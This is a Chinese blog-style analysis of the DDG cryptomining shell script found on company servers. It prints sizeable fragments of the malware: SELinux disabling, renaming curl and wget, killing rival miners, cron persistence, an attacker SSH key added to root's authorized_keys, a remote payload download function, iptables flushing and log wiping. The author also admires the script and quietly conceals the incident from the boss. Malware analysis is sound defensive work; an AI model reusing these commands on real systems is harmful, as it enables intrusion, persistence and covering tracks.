一个“挖矿脚本”还能难得住我?

安全 应用安全
公司有几台机器,最近 CPU 一直在疯转,就像是吃了药,一直在发热。由于机器实在是太多,有这么几台安全性防护没有到位,就一直躺在角落里疯狂运转。

 公司有几台机器,最近 CPU 一直在疯转,就像是吃了药,一直在发热。由于机器实在是太多,有这么几台安全性防护没有到位,就一直躺在角落里疯狂运转。

[[328527]]
图片来自 Pexels

直到统一的监控脚本接管了这几台机器,异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程,发现是一个挖矿脚本。

下载下来学习了一下,发现脚本的编写者,有着较高的水平。虽然在别人机器进行挖矿行为是不道德的,但掩盖不了脚本编写者的风骚操作。

挖矿,是计算机技术界最让人迷惑的行为之一,但它赚钱。据悉,这段脚本名叫 DDG,已经挖取了价值一千多万人民币的虚拟币货币。

本着学习的目的,我稍微分析了一下这个神奇的脚本,也算是吸尽它的精华,为我所用。

这事我都没敢告诉老板,因为说了他也不懂,反生事端。不过和大家交流一下还是可以的,因为你们懂啊。

01.Code 1

  1. #!/bin/sh 

脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个 SHELL 执行。

像我们平常用的 bash、zsh 等,属于 sh 的超集,这个脚本使用 sh 作为执行的 shell,具有更好的可移植性。

02.Code 2

  1. setenforce 0 2>dev/null 
  2. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null 

setenforce 是 Linux 的 selinux 防火墙配置命令,执行 setenforce 0 表示关闭 selinux 防火墙。2 代表的是标准错误(stderr)的意思。

所以后面,使用重定向符,将命令的错误输出定向到 /dev/null 设备中。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。

03.Code 3

  1. sync && echo 3 >/proc/sys/vm/drop_caches 

脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。

众所周知,Linux 系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到 drop_caches 文件里,这个数字通常为 3。

sync 命令将所有未写的系统缓冲区写到磁盘中,执行之后就可以放心的释放缓存了。

04.Code 4

  1. crondir='/var/spool/cron/'"$USER" 
  2. cont=`cat ${crondir}` 
  3. ssht=`cat /root/.ssh/authorized_keys` 
  4. echo 1 > /etc/sysupdates 
  5. rtdir="/etc/sysupdates" 
  6. bbdir="/usr/bin/curl" 
  7. bbdira="/usr/bin/cur" 
  8. ccdir="/usr/bin/wget" 
  9. ccdira="/usr/bin/wge" 
  10. mv /usr/bin/wget /usr/bin/get 
  11. mv /usr/bin/xget /usr/bin/get 
  12. mv /usr/bin/get /usr/bin/wge 
  13. mv /usr/bin/curl /usr/bin/url 
  14. mv /usr/bin/xurl /usr/bin/url 
  15. mv /usr/bin/url /usr/bin/cur 

没错,上面这些语句就是完成了一些普通的操作。值得注意的是,它把我们的一些常用命令,使用 mv 命令给重名了。

这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。

脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到 main 函数的执行,然后看一下这个过程。

05.Code 5

首先是 kill_miner_proc 函数。代码很长,就不全部贴出来了。

  1. kill_miner_proc() 
  2.     ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 
  3.   ... 
  4.     pkill -f biosetjenkins 
  5.     pkill -f Loopback 
  6.     ... 
  7.     crontab -r 
  8.     rm -rf /var/spool/cron/* 

挖矿领域是一个相爱相杀的领域。这个方法首先使用 ps、grep、kill 一套组合,干掉了同行的挖矿脚本,然后停掉了同行的 cron 脚本,黑吃黑的感觉。

在这段脚本里,使用了 pkill 命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。

06.Code 6

接下来执行的是 kill_sus_proc 函数。

  1. ps axf -o "pid"|while read procid 
  2. do 
  3. ... 
  4. done 

ps 加上 o 参数,可以指定要输出的列,在这里只输出的进程的 pid,然后使用 read 函数,对 procid 进行遍历操作。

07.Code 7

  1. ls -l /proc/$procid/exe | grep /tmp 
  2. if [ $? -ne 1 ] 
  3. then 
  4. ... 
  5. fi 

上面就是遍历操作过程了,我们可以看到 if 语句的语法。其中 $? 指的是上一个命令的退出状态。

0 表示没有错误,其他任何值表明有错误。-ne 是不等于的意思,意思就是能够匹配到 tmp 这个字符串。

08.Code 8

  1. ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid 
  2. do 
  3. ... 
  4. done 

呵呵,上面又来了一次循环遍历。不过这次针对的目标,是 CPU 使用超过 40% 的进程。这就有点狠了:影响我挖矿的进程,都得死!相煎何太急。

09.Code 9

再接下来,脚本针对不同的用户属性,进行了不同的操作。

首先是 root 用户。通过判断是否存在 $rtdir 文件,来确定是否是 root 权限。

  1. chattr -i /etc/sysupdate* 
  2. chattr -i /etc/config.json* 
  3. chattr -i /etc/update.sh* 
  4. chattr -i /root/.ssh/authorized_keys* 
  5. chattr -i /etc/networkservice 

使用 chattr 命令,把一些重要的文件,搞成不能任意改动的只读属性,也是够损的。然后,操作 cron 程序,把脚本的更新服务加入到定时中。

就是下面这段脚本。

10.Code 10

  1. if [ ! -f "/usr/bin/crontab" ] 
  2. then 
  3.     echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir} 
  4. else 
  5.     [[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab - 
  6. fi 

注意 [[ $cont =~ "update.sh" ]] 这以小段代码,怪异的很。[[ ]] 是 shell 中内置的一个命令,支持字符串的模式匹配。

使用 =~ 的时候,甚至支持 shell 的正则表达式,强大的令人发指。它的输出结果是一个 bool 类型,所以能够使用||进行拼接。

而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和 `cmd` 的效果基本是一样的。

11.Code 11

搞完了定时任务,就要配置 ssh 自动登录了,通过把公钥追加到信任列表中就可以。

  1. chmod 700 /root/.ssh/ 
  2. echo >> /root/.ssh/authorized_keys 
  3. chmod 600 root/.ssh/authorized_keys 
  4. echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/                      

12.Code 12

说曹操曹操就到,下面的脚本就使用了 `` 进行操作。

  1. filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'
  2. if [ "$filesize_config" -ne "$config_size" ] 
  3. then 
  4.     pkill -f sysupdate 
  5.     rm /etc/config.json 
  6.     downloads $config_url /etc/config.json $config_url_backup 
  7. else 
  8.     echo "no need download" 
  9. fi    

通过一系列骚操作,获取到配置文件的大小,如果判断文件大小不一致,那么就重新下载一个。这就用到了 downloads 函数。

shell 中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。

13.Code 13

  1. downloads $config_url /etc/config.json $config_url_backup 

这句话,就传递了三个参数。当然,文件要从遥远的服务器上下载。域名是 .de 结尾的,证明是个德国的域名,其他的我们一无所知。

  1. downloads() 
  2.     if [ -f "/usr/bin/curl" ] 
  3.     then 
  4.     echo $1,$2 
  5.         http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1` 
  6.         if [ "$http_code" -eq "200" ] 
  7.         then 
  8.             curl --connect-timeout 10 --retry 100 $1 > $2 
  9.         elif [ "$http_code" -eq "405" ] 
  10.         then 
  11.             curl --connect-timeout 10 --retry 100 $1 > $2 
  12.         else 
  13.             curl --connect-timeout 10 --retry 100 $3 > $2 
  14.         fi 
  15.     elif [ -f "/usr/bin/cur" ] 
  16.     then 
  17.         http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1` 
  18.         if [ "$http_code" -eq "200" ] 
  19.         then 
  20.             cur --connect-timeout 10 --retry 100 $1 > $2 
  21.         elif [ "$http_code" -eq "405" ] 
  22.         then 
  23.             cur --connect-timeout 10 --retry 100 $1 > $2 
  24.         else 
  25.             cur --connect-timeout 10 --retry 100 $3 > $2 
  26. fi 
  27.     elif [ -f "/usr/bin/wget" ] 
  28.     then 
  29.         wget --timeout=10 --tries=100 -O $2 $1 
  30.         if [ $? -ne 0 ] 
  31.     then 
  32.         wget --timeout=10 --tries=100 -O $2 $3 
  33.         fi 
  34.     elif [ -f "/usr/bin/wge" ] 
  35.     then 
  36.         wge --timeout=10 --tries=100 -O $2 $1 
  37.         if [ $? -eq 0 ] 
  38.         then 
  39.             wge --timeout=10 --tries=100 -O $2 $3 
  40.         fi 
  41.     fi 

我认为,这段代码作者写的又臭又长,完全没有体现出自己应有的水平。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。

我们上面说到,脚本改了几个命令的名字,其中就有 curl。这个命令是如此的强大,以至于脚本的作者都忍不住加了不少参数:

  • -I:用来测试 http 头信息。
  • -m:设置最大传输时间。
  • -o:指定保持的文件名。这里是 /dev/null,呃呃呃......
  • -s:静默模式,不输出任何东西。
  • --connect-timeout:连接超时时间。
  • --retry:重试次数,好狠,100 次。

如果没有 curl?那就使用替补的 wget,套路都是一样的。

14.Code 14

接下来是一系列相似的操作,最后,对 iptables 一批操作。

  1. iptables -F 
  2. iptables -X 
  3. iptables -A OUTPUT -p tcp --dport 3333 -j DROP 
  4. iptables -A OUTPUT -p tcp --dport 5555 -j DROP 
  5. iptables -A OUTPUT -p tcp --dport 7777 -j DROP 
  6. iptables -A OUTPUT -p tcp --dport 9999 -j DROP 
  7. iptables -I INPUT -s 43.245.222.57 -j DROP 
  8. service iptables reload 

15.Code 15

细心的脚本编写者,还使用命令清理了操作日志。

  1. history -c 
  2. echo > /var/spool/mail/root 
  3. echo > /var/log/wtmp 
  4. echo > /var/log/secure 
  5. echo > /root/.bash_history 

不露死角,潇洒走开。可以看到,且不说真正的挖矿程序,仅仅是这个小脚本,作者也下足了功夫。

脚本里命令繁多,使用方式多样,缩紧格式优雅,除了有一点啰嗦,没有加密之外,是一个非常好的拿来学习的脚本。

瞧了瞧被控制的机器,我赶紧偷偷的重装了机器。就当它是一个梦吧。老板问起的时候,什么都没有发生过。

作者:小姐姐味道

简介:聚焦基础架构和 Linux。十年架构,日百亿流量,与你探讨高并发世界,给你不一样的味道。个人微信 xjjdog0,欢迎添加好友,进一步交流。

编辑:陶家龙

出处:转载自微信公众号小姐姐味道(ID:xjjdog)

责任编辑:武晓燕 来源: 小姐姐味道
相关推荐

2022-05-30 08:02:51

事务日志MySQL数据库

2014-07-08 09:27:24

SQLSERVER脚本

2023-12-28 08:01:59

2022-03-07 05:53:41

线程CPU代码

2021-04-15 09:18:22

单例饿汉式枚举

2015-04-30 08:03:36

2018-08-05 06:16:00

2013-05-21 09:32:11

ChromebookChrome OS

2012-11-28 13:25:27

程序员

2014-07-22 10:51:02

密码安全

2020-11-04 07:56:19

工具Linux 翻译

2009-04-13 08:46:07

2023-12-26 18:47:32

2017-07-05 13:34:10

2013-05-13 10:24:44

谷歌开发团队开发管理

2011-08-23 17:42:42

Lua脚本

2013-08-14 10:23:22

创业个人创业互联网创业

2022-05-16 08:42:26

Pandasbug

2022-07-26 08:14:16

注册中心ProviderConsumer

2019-08-02 17:48:16

戴尔
点赞
收藏

51CTO技术栈公众号